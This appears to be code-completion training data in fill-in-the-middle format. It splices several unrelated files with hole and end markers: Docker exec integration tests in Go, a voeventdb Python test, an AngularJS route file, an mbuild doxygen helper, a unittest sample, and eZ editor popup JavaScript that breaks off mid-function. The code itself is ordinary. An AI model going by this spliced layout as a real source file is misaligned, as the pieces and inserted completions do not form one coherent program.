if out, err := s.d.Cmd("start", "top"); err != nil {
c.Fatalf("Could not start top after daemon restart: err=%v\n%s", err, out)
}
out, err := s.d.Cmd("exec", "top", "echo", "hello")
if err != nil {
c.Fatalf("Could not exec on container top: err=%v\n%s", err, out)
}
outStr := strings.TrimSpace(string(out))
if outStr != "hello" {
c.Errorf("container should've printed hello, instead printed %q", outStr)
}
}
// Regression test for #9155, #9044
func (s *DockerSuite) TestExecEnv(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-e", "LALA=value1", "-e", "LALA=value2",
"-d", "--name", "testing", "busybox", "top")
out, _ := dockerCmd(c, "exec", "testing", "env")
if strings.Contains(out, "LALA=value1") ||
!strings.Contains(out, "LALA=value2") ||
!strings.Contains(out, "HOME=/root") {
c.Errorf("exec env(%q), expect %q, %q", out, "LALA=value2", "HOME=/root")
}
}
func (s *DockerSuite) TestExecExitStatus(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
// Test normal (non-detached) case first
cmd := exec.Command(dockerBinary, "exec", "top", "sh", "-c", "exit 23")
ec, _ := runCommand(cmd)
if ec != 23 {
c.Fatalf("Should have had an ExitCode of 23, not: %d", ec)
}
}
func (s *DockerSuite) TestExecPausedContainer(c *check.C) {
testRequires(c, DaemonIsLinux)
defer unpauseAllContainers()
out, _ := dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
ContainerID := strings.TrimSpace(out)
dockerCmd(c, "pause", "testing")
out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello")
if err == nil {
c.Fatal("container should fail to exec new command if it is paused")
}
expected := ContainerID + " is paused, unpause the container before exec"
if !strings.Contains(out, expected) {
c.Fatal("container should not exec new command if it is paused")
}
}
// regression test for #9476
func (s *DockerSuite) TestExecTtyCloseStdin(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "-it", "--name", "exec_tty_stdin", "busybox")
cmd := exec.Command(dockerBinary, "exec", "-i", "exec_tty_stdin", "cat")
stdinRw, err := cmd.StdinPipe()
if err != nil {
c.Fatal(err)
}
stdinRw.Write([]byte("test"))
stdinRw.Close()
if out, _, err := runCommandWithOutput(cmd); err != nil {
c.Fatal(out, err)
}
out, _ := dockerCmd(c, "top", "exec_tty_stdin")
outArr := strings.Split(out, "\n")
if len(outArr) > 3 || strings.Contains(out, "nsenter-exec") {
c.Fatalf("exec process left running\n\t %s", out)
}
}
func (s *DockerSuite) TestExecTtyWithoutStdin(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox")
id := strings.TrimSpace(out)
c.Assert(waitRun(id), check.IsNil)
errChan := make(chan error)
go func() {
defer close(errChan)
cmd := exec.Command(dockerBinary, "exec", "-ti", id, "true")
if _, err := cmd.StdinPipe(); err != nil {
errChan <- err
return
}
expected := "cannot enable tty mode"
if out, _, err := runCommandWithOutput(cmd); err == nil {
errChan <- fmt.Errorf("exec should have failed")
return
} else if !strings.Contains(out, expected) {
errChan <- fmt.Errorf("exec failed with error %q: expected %q", out, expected)
return
}
}()
select {
case err := <-errChan:
c.Assert(err, check.IsNil)
case <-time.After(3 * time.Second):
c.Fatal("exec is running but should have failed")
}
}
func (s *DockerSuite) TestExecParseError(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top")
// Test normal (non-detached) case first
cmd := exec.Command(dockerBinary, "exec", "top")
if _, stderr, code, err := runCommandWithStdoutStderr(cmd); err == nil || !strings.Contains(stderr, "See '"+dockerBinary+" exec --help'") || code == 0 {
c.Fatalf("Should have thrown error & point to help: %s", stderr)
}
}
func (s *DockerSuite) TestExecStopNotHanging(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
if err := exec.Command(dockerBinary, "exec", "testing", "top").Start(); err != nil {
c.Fatal(err)
}
type dstop struct {
out []byte
err error
}
ch := make(chan dstop)
go func() {
out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput()
ch <- dstop{out, err}
close(ch)
}()
select {
case <-time.After(3 * time.Second):
c.Fatal("Container stop timed out")
case s := <-ch:
c.Assert(s.err, check.IsNil)
}
}
func (s *DockerSuite) TestExecCgroup(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top")
out, _ := dockerCmd(c, "exec", "testing", "cat", "/proc/1/cgroup")
containerCgroups := sort.StringSlice(strings.Split(out, "\n"))
var wg sync.WaitGroup
var mu sync.Mutex
execCgroups := []sort.StringSlice{}
errChan := make(chan error)
// exec a few times concurrently to get consistent failure
for i := 0; i < 5; i++ {
wg.Add(1)
go func() {
out, _, err := dockerCmdWithError("exec", "testing", "cat", "/proc/self/cgroup")
if err != nil {
errChan <- err
return
}
cg := sort.StringSlice(strings.Split(out, "\n"))
mu.Lock()
execCgroups = append(execCgroups, cg)
mu.Unlock()
wg.Done()
}()
}
wg.Wait()
close(errChan)
for err := range errChan {
c.Assert(err, check.IsNil)
}
for _, cg := range execCgroups {
if !reflect.DeepEqual(cg, containerCgroups) {
fmt.Println("exec cgroups:")
for _, name := range cg {
fmt.Printf(" %s\n", name)
}
fmt.Println("container cgroups:")
for _, name := range containerCgroups {
fmt.Printf(" %s\n", name)
}
c.Fatal("cgroups mismatched")
}
}
}
func (s *DockerSuite) TestInspectExecID(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
id := strings.TrimSuffix(out, "\n")
out, err := inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
if out != "[]" {
c.Fatalf("ExecIDs should be empty, got: %s", out)
}
// Start an exec, have it block waiting so we can do some checking
cmd := exec.Command(dockerBinary, "exec", id, "sh", "-c",
"while ! test -e /tmp/execid1; do sleep 1; done")
if err = cmd.Start(); err != nil {
c.Fatalf("failed to start the exec cmd: %q", err)
}
// Give the exec 10 chances/seconds to start then give up and stop the test
tries := 10
for i := 0; i < tries; i++ {
// Since its still running we should see exec as part of the container
out, err = inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
out = strings.TrimSuffix(out, "\n")
if out != "[]" && out != "<no value>" {
break
}
if i+1 == tries {
c.Fatalf("ExecIDs should not be empty, got: %s", out)
}
time.Sleep(1 * time.Second)
}
// Save execID for later
execID, err := inspectFilter(id, "index .ExecIDs 0")
if err != nil {
c.Fatalf("failed to get the exec id: %v", err)
}
// End the exec by creating the missing file
err = exec.Command(dockerBinary, "exec", id,
"sh", "-c", "touch /tmp/execid1").Run()
if err != nil {
c.Fatalf("failed to run the 2nd exec cmd: %q", err)
}
// Wait for 1st exec to complete
cmd.Wait()
// All execs for the container should be gone now
out, err = inspectField(id, "ExecIDs")
if err != nil {
c.Fatalf("failed to inspect container: %s, %v", out, err)
}
out = strings.TrimSuffix(out, "\n")
if out != "[]" && out != "<no value>" {
c.Fatalf("ExecIDs should be empty, got: %s", out)
}
// But we should still be able to query the execID
sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil)
if sc != http.StatusOK {
c.Fatalf("received status != 200 OK: %d\n%s", sc, body)
}
// Now delete the container and then an 'inspect' on the exec should
// result in a 404 (not 'container not running')
out, ec := dockerCmd(c, "rm", "-f", id)
if ec != 0 {
c.Fatalf("error removing container: %s", out)
}
sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil)
if sc != http.StatusNotFound {
c.Fatalf("received status != 404: %d\n%s", sc, body)
}
}
func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) {
testRequires(c, DaemonIsLinux)
var out string
out, _ = dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
idA := strings.TrimSpace(out)
if idA == "" {
c.Fatal(out, "id should not be nil")
}
out, _ = dockerCmd(c, "run", "-d", "--link", "container1:alias1", "--name", "container2", "busybox", "top")
idB := strings.TrimSpace(out)
if idB == "" {
c.Fatal(out, "id should not be nil")
}
dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
dockerCmd(c, "rename", "container1", "container_new")
dockerCmd(c, "exec", "container2", "ping", "-c", "1", "alias1", "-W", "1")
}
func (s *DockerSuite) TestRunExecDir(c *check.C) {
testRequires(c, SameHostDaemon)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
id := strings.TrimSpace(out)
execDir := filepath.Join(execDriverPath, id)
stateFile := filepath.Join(execDir, "state.json")
{
fi, err := os.Stat(execDir)
if err != nil {
c.Fatal(err)
}
if !fi.IsDir() {
c.Fatalf("%q must be a directory", execDir)
}
fi, err = os.Stat(stateFile)
if err != nil {
c.Fatal(err)
}
}
dockerCmd(c, "stop", id)
{
_, err := os.Stat(execDir)
if err == nil {
c.Fatal(err)
}
if err == nil {
c.Fatalf("Exec directory %q exists for removed container!", execDir)
}
if !os.IsNotExist(err) {
c.Fatalf("Error should be about non-existing, got %s", err)
}
}
dockerCmd(c, "start", id)
{
fi, err := os.Stat(execDir)
if err != nil {
c.Fatal(err)
}
if !fi.IsDir() {
c.Fatalf("%q must be a directory", execDir)
}
fi, err = os.Stat(stateFile)
if err != nil {
c.Fatal(err)
}
}
dockerCmd(c, "rm", "-f", id)
{
_, err := os.Stat(execDir)
if err == nil {
c.Fatal(err)
}
if err == nil {
c.Fatalf("Exec directory %q is exists for removed container!", execDir)
}
if !os.IsNotExist(err) {
c.Fatalf("Error should be about non-existing, got %s", err)
}
}
}
func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) {
testRequires(c, SameHostDaemon)
for _, fn := range []string{"resolv.conf", "hosts"} {
deleteAllContainers()
content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)))
if err != nil {
c.Fatal(err)
}
if strings.TrimSpace(string(content)) != "success" {
c.Fatal("Content was not what was modified in the container", string(content))
}
out, _ := dockerCmd(c, "run", "-d", "--name", "c2", "busybox", "top")
contID := strings.TrimSpace(out)
netFilePath := containerStorageFile(contID, fn)
f, err := os.OpenFile(netFilePath, os.O_WRONLY|os.O_SYNC|os.O_APPEND, 0644)<|fim▁hole|> if err != nil {
c.Fatal(err)
}
if _, err := f.Seek(0, 0); err != nil {
f.Close()
c.Fatal(err)
}
if err := f.Truncate(0); err != nil {
f.Close()
c.Fatal(err)
}
if _, err := f.Write([]byte("success2\n")); err != nil {
f.Close()
c.Fatal(err)
}
f.Close()
res, _ := dockerCmd(c, "exec", contID, "cat", "/etc/"+fn)
if res != "success2\n" {
c.Fatalf("Expected content of %s: %q, got: %q", fn, "success2\n", res)
}
}
}
func (s *DockerSuite) TestExecWithUser(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top")
out, _ := dockerCmd(c, "exec", "-u", "1", "parent", "id")
if !strings.Contains(out, "uid=1(daemon) gid=1(daemon)") {
c.Fatalf("exec with user by id expected daemon user got %s", out)
}
out, _ = dockerCmd(c, "exec", "-u", "root", "parent", "id")
if !strings.Contains(out, "uid=0(root) gid=0(root)") {
c.Fatalf("exec with user by root expected root user got %s", out)
}
}
func (s *DockerSuite) TestExecWithPrivileged(c *check.C) {
testRequires(c, DaemonIsLinux)
// Start main loop which attempts mknod repeatedly
dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`)
// Check exec mknod doesn't work
cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16")
out, _, err := runCommandWithOutput(cmd)
if err == nil || !strings.Contains(out, "Operation not permitted") {
c.Fatalf("exec mknod in --cap-drop=ALL container without --privileged should fail")
}
// Check exec mknod does work with --privileged
cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`)
out, _, err = runCommandWithOutput(cmd)
if err != nil {
c.Fatal(err, out)
}
if actual := strings.TrimSpace(out); actual != "ok" {
c.Fatalf("exec mknod in --cap-drop=ALL container with --privileged failed: %v, output: %q", err, out)
}
// Check subsequent unprivileged exec cannot mknod
cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32")
out, _, err = runCommandWithOutput(cmd)
if err == nil || !strings.Contains(out, "Operation not permitted") {
c.Fatalf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")
}
// Confirm at no point was mknod allowed
logCmd := exec.Command(dockerBinary, "logs", "parent")
if out, _, err := runCommandWithOutput(logCmd); err != nil || strings.Contains(out, "Success") {
c.Fatal(out, err)
}
}
func (s *DockerSuite) TestExecWithImageUser(c *check.C) {
testRequires(c, DaemonIsLinux)
name := "testbuilduser"
_, err := buildImage(name,
`FROM busybox
RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
USER dockerio`,
true)
if err != nil {
c.Fatalf("Could not build image %s: %v", name, err)
}
dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top")
out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami")
if !strings.Contains(out, "dockerio") {
c.Fatalf("exec with user by id expected dockerio user got %s", out)
}
}
func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--read-only", "--name", "parent", "busybox", "top")
if _, status := dockerCmd(c, "exec", "parent", "true"); status != 0 {
c.Fatalf("exec into a read-only container failed with exit status %d", status)
}
}
// #15750
// TODO Fix this test on windows #16738
func (s *DockerSuite) TestExecStartFails(c *check.C) {
testRequires(c, DaemonIsLinux, SameHostDaemon)
name := "exec-15750"
dockerCmd(c, "run", "-d", "--name", name, "busybox", "top")
c.Assert(waitRun(name), check.IsNil)
out, _, err := dockerCmdWithError("exec", name, "no-such-cmd")
c.Assert(err, check.NotNil, check.Commentf(out))
c.Assert(out, checker.Contains, "executable file not found")
}<|fim▁end|> | |
<|file_name|>test_fixture_creation.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from unittest import TestCase
from datetime import datetime, timedelta
from voeventdb.server.tests.fixtures import fake, packetgen
class TestBasicRoutines(TestCase):
def setUp(self):
self.start = datetime(2015, 1, 1)
self.interval = timedelta(minutes=15)
def test_timerange(self):
n_interval_added = 5
times = [t for t in
packetgen.timerange(self.start,
self.start+self.interval*n_interval_added,
self.interval)]
self.assertEqual(n_interval_added, len(times))
self.assertEqual(self.start, times[0])
def test_heartbeat(self):
n_interval = 4*6
packets = fake.heartbeat_packets(self.start, self.interval,
n_interval)<|fim▁hole|><|fim▁end|> | self.assertEqual(n_interval, len(packets)) |
<|file_name|>app.js<|end_file_name|><|fim▁begin|>'use strict';
'use strict';
angular.module('appModule', [ 'ngRoute', 'appControllers' ])
.config(function($routeProvider) {
$routeProvider.when('/home', {<|fim▁hole|> controller : 'PostCodeCtrl',
templateUrl : '/views/postcode/list.html'
}).when('/postcode/:id', {
controller : 'PostCodeEditCtrl',
templateUrl : '/views/postcode/detail.html'
}).otherwise({
redirectTo : '/home'
});
});<|fim▁end|> | controller : 'SettingCtrl',
templateUrl : '/views/public/setting.html'
}).when('/postcodes', { |
<|file_name|>doxygen.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- python -*-
#BEGIN_LEGAL
#
#Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
############################################################################
## START OF IMPORTS SETUP
############################################################################
import sys
import os
import re
import copy
import glob
import types
try:
from . import base
from . import dag
from . import util
from . import plan
except:
s = "\nXED ERROR: mfile.py could not find mbuild." + \
" Should be a sibling of the xed2 directory.\n\n"
sys.stderr.write(s)
sys.exit(1)
###########################################################################
## DOXYGEN SUPPORT
###########################################################################
def _doxygen_version_okay(s, want_major, want_minor, want_fix):
values = s.split('.')
maj =int(values[0])
minor = int(values[1])
fix = 0
if len(values) > 2:
# remove everything after the dash for things like: 'Doxygen
# 1.5.1-p1'
values[2] = re.sub(r'-.*$','',values[2])
try:
fix = int(values[2])
except ValueError as v:
pass
if (maj > 1) or \
(maj == want_major and minor > want_minor) or \
(maj == want_major and minor == want_minor and fix >= want_fix):
return True
return False
def _find_doxygen(env):
"""Find the right version of doxygen. Return a tuple of the
command name and a boolean indicating whether or not the version
checked out."""
if env['doxygen_cmd'] == '':
doxygen_cmd_intel = "/usr/intel/bin/doxygen"
doxygen_cmd_cygwin = "C:/cygwin/bin/doxygen"
doxygen_cmd_mac = \
"/Applications/Doxygen.app/Contents/Resources/doxygen"
doxygen_cmd = "doxygen"
if env['build_os'] == 'win':
if os.path.exists(doxygen_cmd_cygwin):
doxygen_cmd = doxygen_cmd_cygwin
else:
base.msgb('DOXYGEN',"Could not find cygwin's doxygen," +
"trying doxygen from PATH")
elif env['build_os'] == 'lin':
if base.verbose(2):
base.msgb("CHECKING FOR", doxygen_cmd_intel)
if os.path.exists(doxygen_cmd_intel):
doxygen_cmd = doxygen_cmd_intel
elif env['build_os'] == 'mac':
if base.verbose(2):
base.msgb("CHECKING FOR", doxygen_cmd_mac)
if os.path.exists(doxygen_cmd_mac):
doxygen_cmd = doxygen_cmd_mac
else:
doxygen_cmd = env['doxygen_cmd']
doxygen_cmd = env.escape_string(doxygen_cmd)
doxygen_okay = False
if base.verbose(2):
base.msgb('Checking doxygen version','...')
if base.check_python_version(2,4):
try:
(retval, output, error_output) = \
util.run_command(doxygen_cmd + " --version")
if retval==0:
if len(output) > 0:
first_line = output[0].strip()
if base.verbose(2):
base.msgb("Doxygen version", first_line)
doxygen_okay = _doxygen_version_okay(first_line, 1,4,6)
else:
for o in output:
base.msgb("Doxygen-version-check STDOUT", o)
if error_output:
for line in error_output:
base.msgb("STDERR ",line.rstrip())
except:
base.die("Doxygen required by the command line options " +
"but no doxygen found")
return (doxygen_cmd, doxygen_okay)
def _replace_match(istring, mtch, newstring, group_name):
"""This is a lame way of avoiding regular expression backslashing
issues"""
x1= mtch.start(group_name)
x2= mtch.end(group_name)
ostring = istring[0:x1] + newstring + istring[x2:]
return ostring
def _customize_doxygen_file(env, subs):
"""Change the $(*) strings to the proper value in the config file.
Returns True on success"""
# doxygen wants quotes around paths with spaces
for k,s in iter(subs.items()):
if re.search(' ',s):
if not re.search('^".*"$',s):
base.die("Doxygen requires quotes around strings with spaces: [%s]->[%s]" %
( k,s))
return False
# input and output files
try:
lines = open(env['doxygen_config']).readlines()
except:
base.msgb("Could not open input file: " + env['doxygen_config'])
return False
env['doxygen_config_customized'] = \
env.build_dir_join(os.path.basename(env['doxygen_config']) + '.customized')
try:
ofile = open(env['doxygen_config_customized'],'w')
except:
base.msgb("Could not open output file: " + env['doxygen_config_customized'])
return False
# compile the patterns
rsubs = {}
for k,v in iter(subs.items()):
rsubs[k]=re.compile(r'(?P<tag>[$][(]' + k + '[)])')
olines = []
for line in lines:
oline = line
for k,p in iter(rsubs.items()):
#print ('searching for', k, 'to replace it with', subs[k])
m = p.search(oline)
while m:
#print ('replacing', k, 'with', subs[k])
oline = _replace_match(oline, m, subs[k], 'tag')
m = p.search(oline)
olines.append(oline)
try:
for line in olines:
ofile.write(line)
except:
ofile.close()
base.msgb("Could not write output file: " + env['doxygen_config_customized'])
return False
ofile.close()
return True
def _build_doxygen_main(args, env):
"""Customize the doxygen input file. Run the doxygen command, copy
in any images, and put the output in the right place."""
if isinstance(args, list):
if len(args) < 2:
base.die("Need subs dictionary and dummy file arg for the doxygen command " +
"to indicate its processing")
else:
base.die("Need a list for _build_doxygen_main with the subs " +
"dictionary and the dummy file name")
(subs,dummy_file) = args
(doxygen_cmd, doxygen_okay) = _find_doxygen(env)
if not doxygen_okay:
msg = 'No good doxygen available on this system; ' + \
'Your command line arguments\n\trequire it to be present. ' + \
'Consider dropping the "doc" and "doc-build" options\n\t or ' + \
'specify a path to doxygen with the --doxygen knob.\n\n\n'
return (1, [msg]) # failure
else:
env['DOXYGEN'] = doxygen_cmd
try:
okay = _customize_doxygen_file(env, subs)
except:
base.die("CUSTOMIZE DOXYGEN INPUT FILE FAILED")
if not okay:
return (1, ['Doxygen customization failed'])
cmd = env['DOXYGEN'] + ' ' + \
env.escape_string(env['doxygen_config_customized'])
if base.verbose(2):
base.msgb("RUN DOXYGEN", cmd)
(retval, output, error_output) = util.run_command(cmd)
for line in output:
base.msgb("DOX",line.rstrip())
if error_output:
for line in error_output:
base.msgb("DOX-ERROR",line.rstrip())
if retval != 0:
base.msgb("DOXYGEN FAILED")
base.die("Doxygen run failed. Retval=", str(retval))
util.touch(dummy_file)
base.msgb("DOXYGEN","succeeded")
return (0, []) # success
###########################################################################
# Doxygen build
###########################################################################
def _empty_dir(d):
"""return True if the directory d does not exist or if it contains no
files/subdirectories."""
if not os.path.exists(d):
return True
for (root, subdirs, subfiles) in os.walk(d):
if len(subfiles) or len(subdirs):
return False
return True
def _make_doxygen_reference_manual(env, doxygen_inputs, subs, work_queue,
hash_file_name='dox'):
"""Install the doxygen reference manual the doyxgen_output_dir
directory. doxygen_inputs is a list of files """
dox_dag = dag.dag_t(hash_file_name,env=env)
# so that the scanner can find them
dirs = {}
for f in doxygen_inputs:
dirs[os.path.dirname(f)]=True
for d in dirs.keys():
env.add_include_dir(d)
# make sure the config and top file are in the inptus list
doxygen_inputs.append(env['doxygen_config'])
doxygen_inputs.append(env['doxygen_top_src'])
dummy = env.build_dir_join('dummy-doxygen-' + hash_file_name)<|fim▁hole|> # Run it via the builder to make it dependence driven
run_always = False
if _empty_dir(env['doxygen_install']):
run_always = True
if run_always:
_build_doxygen_main([subs,dummy], env)
else:
c1 = plan.plan_t(command=_build_doxygen_main,
args= [subs,dummy],
env= env,
input= doxygen_inputs,
output= dummy)
dox1 = dox_dag.add(env,c1)
okay = work_queue.build(dag=dox_dag)
phase = "DOXYGEN"
if not okay:
base.die("[%s] failed. dying..." % phase)
if base.verbose(2):
base.msgb(phase, "build succeeded")
############################################################
def doxygen_env(env):
"""Add the doxygen variables to the environment"""
doxygen_defaults = dict( doxygen_config='',
doxygen_top_src='',
doxygen_install='',
doxygen_cmd='' )
env.update_dict(doxygen_defaults)
def doxygen_args(env):
"""Add the knobs to the command line knobs parser"""
env.parser.add_option("--doxygen-install",
dest="doxygen_install",
action="store",
default='',
help="Doxygen installation directory")
env.parser.add_option("--doxygen-config",
dest="doxygen_config",
action="store",
default='',
help="Doxygen config file")
env.parser.add_option("--doxygen-top-src",
dest="doxygen_top_src",
action="store",
default='',
help="Doxygen top source file")
env.parser.add_option("--doxygen-cmd",
dest="doxygen_cmd",
action="store",
default='',
help="Doxygen command name")
def doxygen_run(env, inputs, subs, work_queue, hash_file_name='dox'):
"""Run doxygen assuming certain values are in the environment env.
@type env: env_t
@param env: the environment
@type inputs: list
@param inputs: list of input files to scan for dependences
@type subs: dictionary
@param subs: replacements in the config file
@type work_queue: work_queue_t
@param work_queue: a work queue for the build
@type hash_file_name: string
@param hash_file_name: used for the dummy file and mbuild hash suffix
"""
_make_doxygen_reference_manual(env, inputs, subs, work_queue, hash_file_name)<|fim▁end|> | |
<|file_name|>test_foo.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
import unittest
class FooTest(unittest.TestCase):
'''Sample test case -- FooTest()'''
def setUp(self):
'''Set up for testing...'''
print 'FooTest:setUp_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'setting up for test A'
elif (testName == 'Test routine B'):
print 'setting up for test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'FooTest:setUp_:end'
def testA(self):
'''Test routine A'''
print 'FooTest: running testA...'
def testB(self):
'''Test routine B'''
print 'FooTest: running testB...'
def tearDown(self):
'''Tear down from testing...'''
print 'FooTest:tearDown_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'cleaning up after test A'
elif (testName == 'Test routine B'):
print 'cleaning up after test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'FooTest:tearDown_:end'<|fim▁hole|>
class BarTest(unittest.TestCase):
'''Sample test case -- BarTest()'''
def setUp(self):
'''Set up for testing...'''
print 'BarTest:setUp_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'setting up for test A'
elif (testName == 'Test routine B'):
print 'setting up for test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'BarTest:setUp_:end'
def testA(self):
'''Test routine A'''
print 'BarTest: running testA...'
def testB(self):
'''Test routine B'''
print 'BarTest: running testB...'
def tearDown(self):
'''Tear down from testing...'''
print 'BarTest:tearDown_:begin'
testName = self.shortDescription()
if (testName == 'Test routine A'):
print 'cleaning up after test A'
elif (testName == 'Test routine B'):
print 'cleaning up after test B'
else:
print 'UNKNOWN TEST ROUTINE'
print 'BarTest:tearDown_:end'
if __name__ == '__main__':
unittest.main()<|fim▁end|> | |
<|file_name|>popup_utils.js<|end_file_name|><|fim▁begin|>/*
eZ Online Editor MCE popup : common js code used in popups
Created on: <06-Feb-2008 00:00:00 ar>
Copyright (c) 1999-2014 eZ Systems AS
Licensed under the GPL 2.0 License:
http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
*/
var eZOEPopupUtils = {
embedObject: {},
settings: {
// optional css class to add to tag when we save ( does not replace any class selectors you have)
cssClass: '',
// the ez xml name of the tag
tagName: '',
// optional a checkbox / dropdown that selects the tag type
tagSelector: false,
// optional custom call back funtion if tagSelector change
tagSelectorCallBack: false,
// optional a function to generate the html for the tag ( on create in save() )
tagGenerator: false,
// optional a function to do cleanup after tag has been created ( after create in save() )
onTagGenerated: false,
// optional function to edit the tag ( on edit in save() )
tagEditor: false,
// optional function to generate attribute
attributeGenerator: {},
// optional custom function to handle setting attributes on element edit and create
tagAttributeEditor: false,
// form id that save() is attached to
form: '',
// optional canel button that cancel function is attached to
cancelButton: '',
// content type switch for embed tags
contentType: '',
// internal element in editor ( false on create ), set by init()
editorElement: false,
// event to call on init
onInit: false,
// event to call after init
onInitDone : false,
// events to call after init
onInitDoneArray : [],
// custom attribute to style map to be able to preview style changes
customAttributeStyleMap: false,
// set on init if no editorElement is present and selected text is without newlines
editorSelectedText: false,
// Same as above but with markup
editorSelectedHtml: false,
// the selected node in the editor, set on init
editorSelectedNode: false,
// generates class name for tr elements in browse / search / bookmark list
browseClassGenerator: function(){ return ''; },
// generates browse link for a specific mode
browseLinkGenerator: false,
// custom init function pr custom attribute
customAttributeInitHandler: [],
// custom save function pr custom attribute
customAttributeSaveHandler: [],
// Title text to set on tilte tag and h2#tag-edit-title tag in tag edit / create dialogs
tagEditTitleText: '',
// the default image alias to use while browsing
browseImageAlias: 'small'
},
/**
* Initialize page with values from current editor element or if not defined; default values and settings
*
* @param {Object} settings Hash with settings, is saved to eZOEPopupUtils.settings for the rest of the execution.
*/
init: function( settings )
{
eZOEPopupUtils.settings = jQuery.extend( false, eZOEPopupUtils.settings, settings );
var ed = tinyMCEPopup.editor, el = tinyMCEPopup.getWindowArg('selected_node'), s = eZOEPopupUtils.settings;
if ( !s.selectedTag ) s.selectedTag = s.tagName;
if ( s.form && (s.form = jQuery( '#' + s.form )) )
s.form.submit( eZOEPopupUtils.save );
if ( s.cancelButton && (s.cancelButton = jQuery( '#' + s.cancelButton )) )
s.cancelButton.click( eZOEPopupUtils.cancel );
if ( el && el.nodeName )
{
s.editorElement = el;
if ( s.tagEditTitleText )
{
document.title = s.tagEditTitleText;
jQuery( '#tag-edit-title').html( s.tagEditTitleText );
if ( window.parent && window.parent.ez )
{
// set title on inline popup if inlinepopup tinyMCE plugin is used
var tinyInlinePopupsTitle = window.parent.jQuery('div.clearlooks2');
if ( tinyInlinePopupsTitle && tinyInlinePopupsTitle.size() )
window.parent.document.getElementById( tinyInlinePopupsTitle[0].id + '_title').innerHTML = s.tagEditTitleText;
}
}
}
else
{
var selectedHtml = ed.selection.getContent( {format:'text'} );
if ( !/\n/.test( selectedHtml ) && jQuery.trim( selectedHtml ) !== '' )
s.editorSelectedText = selectedHtml;
selectedHtml = ed.selection.getContent( {format:'html'} );
if ( jQuery.trim( selectedHtml ) !== '' )
s.editorSelectedHtml = selectedHtml;
}
s.editorSelectedNode = ed.selection.getNode();
if ( s.onInit && s.onInit.call )
s.onInit.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
if ( s.tagSelector && ( s.tagSelector = jQuery( '#' + s.tagSelector ) ) && s.tagSelector.size() && s.tagSelector[0].value
&& ( s.tagSelector[0].checked === undefined || s.tagSelector[0].checked === true ) )
s.selectedTag = s.tagSelector[0].value;
if ( s.editorElement )
{
eZOEPopupUtils.initGeneralmAttributes( s.tagName + '_attributes', s.editorElement );
eZOEPopupUtils.initCustomAttributeValue( s.selectedTag + '_customattributes', s.editorElement.getAttribute('customattributes'))
}
if ( s.tagSelector && s.tagSelector.size() )
{
// toggle custom attributes based on selected custom tag
if ( s.tagSelectorCallBack && s.tagSelectorCallBack.call )
{
// custom function to call when tag selector change
// 'this' is jQuery object of selector
// first param is event/false and second is element of selector
